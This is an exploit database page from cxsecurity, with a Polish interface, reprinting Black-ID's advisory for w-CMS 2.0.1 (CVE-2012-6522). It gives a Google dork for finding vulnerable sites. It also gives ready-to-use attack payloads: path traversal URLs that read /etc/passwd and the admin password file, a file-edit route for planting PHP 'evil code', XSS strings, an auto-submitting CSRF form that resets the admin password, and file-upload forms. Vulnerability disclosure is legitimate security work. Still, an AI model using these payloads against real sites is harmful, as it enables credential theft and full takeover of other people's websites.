Index
Bugtraq
Pełna lista
Błędy
Sztuczki
Exploity
Dorks list
Tylko z CVE
Tylko z CWE
Bogus
Ranking
CVEMAP
Świeża lista CVE
Producenci
Produkty
Słownik CWE
Sprawdź nr. CVE
Sprawdź nr. CWE
Szukaj
W Bugtraq
W bazie CVE
Po autorze
Po nr. CVE
Po nr. CWE
Po producencie
Po produkcie
RSS
Bugtraq
CVEMAP
CVE Produkty
Tylko Błędy
Tylko Exploity
Tylko Dorks
Więcej
cIFrex
Facebook
Twitter
Donate
O bazie
Lang
Polish
English
Submit
w-CMS 2.0.1 CSRF / XSS / File Disclosure / Shell Upload
2012-04-07 / 2013-02-05
Credit:
Black-ID
Risk:
High
Local:
No
Remote:
Yes
CVE:
CVE-2012-6522
CWE:
CWE-79
CWE-352
Dork:
intext:\"Powered by w-CMS\" |
Ogólna skala CVSS:
5/10
Znaczenie:
2.9/10
Łatwość wykorzystania:
10/10
Wymagany dostęp:
Zdalny
Złożoność ataku:
Niska
Autoryzacja:
Nie wymagana
Wpływ na poufność:
Częściowy
Wpływ na integralność:
Brak
Wpływ na dostępność:
Brak
+----------------------------------------------------------------------+ | ____ _ _ _____ _____ | | | _ \| | | | |_ _| __ \ | | | |_) | | __ _ ___| | __ _____ | | | | | | | | | _ <| |/ _` |/ __| |/ / |_____|| | | | | | | | | |_) | | (_| | (__| < _| |_| |__| | | | |____/|_|\__,_|\___|_|\_\ |_____|_____/ | | | |/********************************************************************\| | | | [x] Exploit Title: w-CMS 2.0.1 Multiple Vulnerabilities | | [x] Google Dork: intext:"Powered by w-CMS" | | [x] Version : 2.0.1 | | [x] WebSite : http://w-cms.org/ | | [x] Software Link: http://wcms.googlecode.com/files/wcms-2.01.zip | | [x] Author: Black-ID | | [x] Tested on: Win Xp/7 Linux Uubuntu 10.04 | | [x] Platform: Php | | [x] Risk : High | +----------------------------------------------------------------------+ PoC/Exploit: 1.# Local File Disclosure [LFD] ~ [PoC]Http://[victim]/path/?p=../../../../../../boot.ini ~ [PoC]Http://[victim]/path/index.php?p=../../../../../../boot.ini ~ [PoC]Http://[victim]/path/?p=../../../../../../etc/passwd ~ [PoC]Http://[victim]/path/index.php?p=../../../../../../etc/passwd # Admin Pass Disclosure ~ [PoC]Http://[victim]/path/index.php?p=../../password +----------------------------------------------------------------------+ 2.# Local File Edit/Write ~ [PoC]Http://[victim]/admin.php?edit=../../../dz0.php Just Fill The Text Area With Evil Code (Php) & Click Save +----------------------------------------------------------------------+ 3.# Cross Site Scripting (XSS) ~ [PoC]Http://[victim]/path/?p=<script>alert('Dz0')</script> ~ [PoC]Http://[victim]/path/index.php?p=<script>alert('Dz0')</script> +----------------------------------------------------------------------+ 4.# Html Code Injection ~ [PoC]Http://[victim]/path/(Guestbook Path)Or(Contact Path) You Can Inject Html Code In The text Area Exapmle : <H3>Own3d</H3> ++ You Can Inject Xss Too Exapmle : <script>alert('Dz0')</script> +----------------------------------------------------------------------+ 5.# Cross Site Request Forgny (CSRF) Admin Change Pass ~ [PoC] Inject This Evil Code In Contact Form <html> <head> <title>Test</title> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <SCRIPT LANGUAGE="JavaScript"><!-- setTimeout('document.test.submit()',0); //--></SCRIPT> </head> <body> <form name="test" id="form1" method="post" action="http://localhost/wcms-2.01/admin.php?settings=password"><!-- Target Site --> <p> <input name="password1" type="text" value="dz0" /><!-- New Password --> <input name="password2" type="text" value="dz0"/><!-- Confirm Password --> </p> <p><input type="submit" name="Change" value="Change" /> </p> </form> </body> </html> +----------------------------------------------------------------------+ 6.# Arbitary File Upload ~ [PoC]Http://[victim]/admin.php # Add Folder <form action='Http://[victim]/path/admin.php' method='post'><input type='hidden' name='files' value='folders' /><h2> Update Folders</h2><div class='left'> Folder Name</div> <div class='right'> <input name='newfolder' value='' /><br /><input style='width: auto;' class='button' type='submit' value='Add' /></form> # Upload File <form class='P10' action='Http://[victim]/admin.php' method='post' enctype='multipart/form-data'> <input type='hidden' name='files' value='upload' /> <h2>Upload Files</h2> <p><b>Folder:</b> <select name='folder'><option value='Dz'>Dz</option></p><p> <div id='settings'> <div class='left'> <p>Files</p> </div> <div class='right'> <input type='file' name='file[]' class='multi' accept='gif|jpg|png|bmp|zip|pdf|txt|doc|docx|xlsx|mp3|swf' /><div class='MultiFile-wrap' id='MultiFile5_wrap'><input style='position: absolute; top: -3000px;' name='' class='multi MultiFile-applied' accept='gif|jpg|png|bmp|zip|pdf|txt|doc|docx|xlsx|mp3|swf' type='file' /><div class='MultiFile-list' id='MultiFile5_wrap_list'></div><div class='MultiFile-label'> <input style='width: auto;' class='button' type='submit' value='Upload' /> </div></div></form> +----------------------------------------------------------------------+ | [x] Greetz : Hidden Pain - Liyan Oz - Kedans Dz - Ddos-Dz | | | | BaC.Dz - Killer-Dz - Cyb3r-DZ - Ev!LsCr!pT_Dz - Th3 Viper | | | | BLaCk_SPECTRE - Kha&miX - Damane2011 - YaSmouh - ra3ch | | | | [x] Special 10x: Sec4Ever.Com - xDZx Team - Is-Sec.Org | +----------------------------------------------------------------------+
Referencje:
http://wcms.googlecode.com/files/wcms-2.01.zip
See this note in RAW Version
Tweet
Vote for this issue:
0
0
50%
50%
Thanks for you vote!
Thanks for you comment!
Your message is in quarantine 48 hours.
Comment it here.
Nick (*)
Email (*)
Video
Text (*)
(*) -
required fields.
Cancel
Submit
{{ x.nick }}
|
Date:
{{ x.ux * 1000 | date:'yyyy-MM-dd' }}
{{ x.ux * 1000 | date:'HH:mm' }}
CET+1
{{ x.comment }}
Show all comments
Copyright
2024
, cxsecurity.com
Back to Top
Polish
English